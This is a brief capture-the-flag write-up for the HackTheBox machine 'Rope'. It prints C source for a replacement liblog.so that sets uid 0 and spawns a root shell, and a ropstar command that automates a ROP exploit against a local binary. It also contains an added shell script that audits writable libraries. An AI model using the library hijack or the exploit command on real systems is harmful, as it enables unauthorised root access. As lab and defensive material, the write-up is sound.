Rope @ HackTheBox
Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the box's webserver and a replaceable shared library used by a binary we can run with sudo. Finally there is another binary where we have to bypass a stack canary and use ROP.
Notes
The user exploit.
Liblog.so:
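#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* printlog() as built into the replacement liblog.so */
void printlog(void) {
    setuid(0);
    setgid(0);
    system("/bin/sh");   /* system() takes a single command string */
}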
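Seen from the defender's side, this step works only because a library loaded by a sudo-permitted binary can be overwritten by a non-root user. The script below is an added example, not part of the original post: it lists the libraries a binary loads and flags any whose file or containing directory is group- or world-writable. All function names are hypothetical.

```sh
#!/bin/sh
# Added example (not from the original post): audit the shared libraries of a
# binary that sudoers lets unprivileged users run.

# Succeeds if the path is group- or world-writable.
is_loose() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Read library paths on stdin; print each one that a non-owner could replace,
# either by writing the file or by writing to the directory that holds it.
replaceable_libs() {
    while IFS= read -r lib; do
        [ -e "$lib" ] || continue
        real=$(readlink -f "$lib")         # libraries are usually symlinks
        if is_loose "$real"; then
            printf '%s: file is group/world-writable\n' "$real"
        elif is_loose "$(dirname "$real")"; then
            printf '%s: directory is group/world-writable\n' "$real"
        fi
    done
}

# Resolve the libraries the dynamic loader would map for a binary.
# ldd may execute the target's loader, so run it only on binaries you trust.
needed_libs() {
    ldd "$1" 2>/dev/null | awk '$2 == "=>" && $3 ~ /^\// { print $3 }
                              $1 ~ /^\// { print $1 }'
}

audit_binary() {
    needed_libs "$1" | replaceable_libs
}

# Usage: sh audit.sh /path/to/sudo-permitted-binary
if [ "$#" -gt 0 ]; then audit_binary "$1"; fi
```

Any line of output is a finding: the library, and every directory holding it, should be owned by root and writable by root only.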
The root exploit.
Solving with ropstar:
python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact
Thanks r4j for creating this fun box!
This post is licensed under CC BY 4.0 by the author.